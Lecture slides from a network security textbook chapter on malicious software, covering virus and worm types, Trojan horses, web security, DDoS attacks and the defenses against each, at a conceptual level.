Chapter 8

J. Wang. Computer Network Security Theory and Practice. Springer 2008

Chapter 8

The Art of Anti Malicious Software


Chapter 8 Outline

8.1 Viruses 8.2 Worms 8.3 Virus Defense 8.4 Trojan Horses 8.5 Hoaxes 8.6 Peer-to-Peer Security 8.7 Web Security 8.8 Distributed Denial of Service Attacks


A computer virus is a piece of code hiding in a program that can automatically copy itself or embed a mutation of itself in other programs Cannot spread on their own Often require a host program to live in Infected program: a host program with virus Uninfected program (healthy program): a program cleared of all viruses Disinfected program: a program once infected but now cleared of viruses

Specific to particular types of file systems, file formats, and operating systems Particular types of architecture, CPU, languages, macros, scripts,

debuggers, and every other form of programming or system environment

Viruses


Virus Types

Classified based on host programs: Boot Virus:

Infect the boot program in the boot sector Use the boot sequence to activate itself Modify the operating system to intercept disk access and infect other disks May also infect an updatable BIOS of a PC computer

File-System Virus: Overwrite table entries and spread itself through file systems File system maintains a table of pointers pointing to the first cluster of a file

File-Format Virus: Infect individual files

Macro Virus: Infect documents containing macro codes


Script Virus: Infect script files Replicate themselves in the form of email attachments, office and Web

documents

Registry Virus: Infect Microsoft Windows registry

Memory-Resident Virus: Infect programs loaded in the main memory for execution

Classified based on embedded forms: Stealth virus:

Usually uses compression to mask itself

Polymorphic virus: May change instruction orderings or encrypt itself into different forms

Metamorphic virus: Can be rewritten automatically during transmission

Virus Types (cont.)


Virus Infection Schemes

Overwrite a segment of an existing program Insert itself at the beginning, in the middle, or at the end of an

uninfected host program Break itself into segments and insert each segment in a different

location of host program Virus has the same access rights as the host program


Virus Infection Schemes (Diagram)


Virus Structure

Consists of 4 main subroutines Infect

Search for host programs and check if infected

Infection-Condition Check for certain conditions to

launch infect subroutine Break-Out

Carry out the actual damage work

Breakout-Condition Check for certain conditions to

launch breakout subroutine


Compressor Viruses

An infected host file will often show a change in size before and after infection

Compressor viruses attempt to hide that change Compress the host file during the

infection period

Decompress the host file during the breakout period

May add padding if the compressed host + viral code is smaller than the original size


Viruses Disseminations

Spread through portable storage devices (traditional): floppy disks, CDs, flash memory sticks

Spread through email attachments, downloaded programs (contemporary): Email is a significant vector because many

email programs and users usually blindly open attachments


Win32 Virus Infection

Dissection Win32 viruses exploit Microsoft’s

Portable Executable (PE) format for infection

A PE file contains: PE sections:

Modules of code, data, resources, import tables, and export tables

PE headers: Provide crucial information of

executable image Natural targets of Win32 viruses


Chapter 8 Outline



Worms

A worm is a standalone program that can replicate itself and spread through networks May be viewed as network viruses

Can execute itself automatically on a remote host May still need a host file for spreading

Most worms consist of Target locator subroutine: find new targets Infection propagator subroutine: transfer itself to a new

computer


Common Worm Types

Mass Mailers Usually attach “@mm” after the worm’s name

Reproduces themselves through email attachments

Rabbits Rapidly replicate themselves until the system crashes

due to the resource load

Often hidden in a file directory or disguised with normal file names


Worm Examples

Morris worm Exploit implementation flaws of

sendmail, finger and rsh/rexec

To infect other computers AQAP

Melissa worm A macro virus targeted at

Microsoft products

Spread via email attachments

Spread fast, creating a huge amount of email traffic


Email Attachments

Email attachments can be classified (roughly) into 3 categories Safe

Non-executable, no macros To-Be-Cautious

Contain macros or executable codes, depend on the sender

Perilous Should not be opened at all


The Code Red Worm

Released in July 2001, it infected about 300K computers within the first 24 hours of its release

It exploited a buffer overflow in Microsoft’s IIS It arrived as a GET /default.ida request (with 224 N’s)

This request starts the worm code execution


Chapter 8 Outline



Virus Defense

Prevention: Block viruses from getting into a healthy system

Install software patches in time Do not download software from untrusted Web sites Do not open “To-Be-Cautious” email attachments from

unknown senders Do not open perilous email attachments

Restoration: Disinfect infected systems Scan files with a virus scanner Keep a backup of system and user files


Standard Scanning Methods

Basic Scanning Search for signatures of known viruses in hostable files Check the size of system files

Heuristic Scanning Search for suspicious code fragments in executable files

ICV Scanning Compute ICV for each uninfected executable file then check

against that value later on

Behavior Monitoring Evaluate the behavior of executing programs


Some Common Anti-Virus Software Products

McAfee VirusScan http://www.mcafee.com

Norton AntiVirus http://www.symantec.com

Avast! AntiVirus http://www.avast.com

AVG http://www.grisoft.com

…


Virus Emulator

Isolated hardware and software to evaluate suspicious programs May create a large

amount of computational overhead

Helps to prevent suspicious programs from causing damage to critical systems


Chapter 8 Outline



Trojan Horses

A program that appears to have some useful functions but contains a malicious payload (a.k.a. warrior code) Cannot replicate itself automatically Require direct user intervention to run

May inflict following types of damages: Install backdoor or Zombieware for DDoS attack Install spyware Look for users’ bank account numbers and private info. Install viruses or other malicious code to other hosts Modify or delete user files


Chapter 8 Outline



Hoaxes

Hoaxes trick users to do something they would normally not do.

Often in the form of email messages Example: “You’ve Got Virus!” hoax The countermeasure of hoaxes is to ignore

them There is no free lunch !!


Chapter 8 Outline



Peer-to-Peer Security

Client-server topology: A small number of servers provide

services to a large number of clients

P2P topology:Ad hoc network, each computer acts both

as a client and a server


Peer-to-Peer Security

Security vulnerabilities: Copyright infringement Consume too much bandwidth and local disk storage

DoS attack P2P application opens a specific port to share files with

unknown users, which may opens a door for Trojan horses, viruses, malicious software

Security measures: Install only official P2P software Scan the downloaded file before opening it Disallow P2P software in company


Chapter 8 Outline



Web Security

Basic types of Web documents: Static documents:

A Web document without executable codes Safe to download

Dynamic documents: A Web document containing executable codes CGI executed on the server computer Download resulting document to client

Active documents: Also contain executable codes, but run on the client computer Download entire document to client for execution


Security of Web Documents

Server-side: May be attacked by

exploiting loopholes in dynamic documents and Web server programs

Security measures: Update to newest version of

Web server programs Manage rigorously CGI

programs and their directories

Only designated person can post CGI at Web server

Client-side: May be attacked by

exploiting loopholes in active documents and Web browser programs

Security measures: Install browser patches Disable JavaScript of

browser Disable Java applets of

browser


Cookies

Web browser is stateless A new connection with a Web server for each URL request Different, unrelated TCP connections have to be established for

subsequent pages

Cookie stores the user information and passes it to the user’s browser

Browser sends the cookie along with user’s request for visiting subsequent pages

Server: must ensure cookies not be used for malicious purposes

Client: remove stored cookies frequently


Spyware

Malicious software installed as a plugin module in Web browser without user’s consent

Spyware may Collect user’s information and send to the attacker Monitor user’s Web surfing activities and pop up ad Modify default settings of browser and redirect to a certain

Webpage

Countermeasures of spyware: Set up a firewall to prevent attackers from embedding spyware Install software patches in time Install anti-spyware software


AJAX Security

Asynchronous JavaScript and XML (AJAX)

AJAX achieves asynchronous interactions to make smooth surfing

Examples: Google Maps Face the same security problems

as traditional Web applications Cross-site scripting attack Silent calls and cookies


Safe Web Surfing

Download software only from trusted Web sites Do not click any button on a popup window Read privacy statements, license statements

and security warnings to find out the risks you may take if you install and run the software

Do not visit other sites with different addresses from the password-protected site

Do not visit suspicious Web sites


Chapter 8 Outline



Master-slave DDoS attack


Master-Slave-Reflector DDoS Attack


DDoS Attack Countermeasures

Reduce the number of vulnerable computers Improve security management of networked computers Set up a backup system Distribute resources appropriately Construct a DDoS monitoring and responding system Keep a complete system log to help trace sources

Make it hard for attackers to find vulnerable computers Close all unnecessary ports to defy IP scans Disconnect network connection when user’s computer is no

longer in use Detect and remove zombieware

Chapter 8

Documents

boot virus

computer virus

script virus

virus defense

stealth virus

polymorphic virus

virus structure

file fileformat virus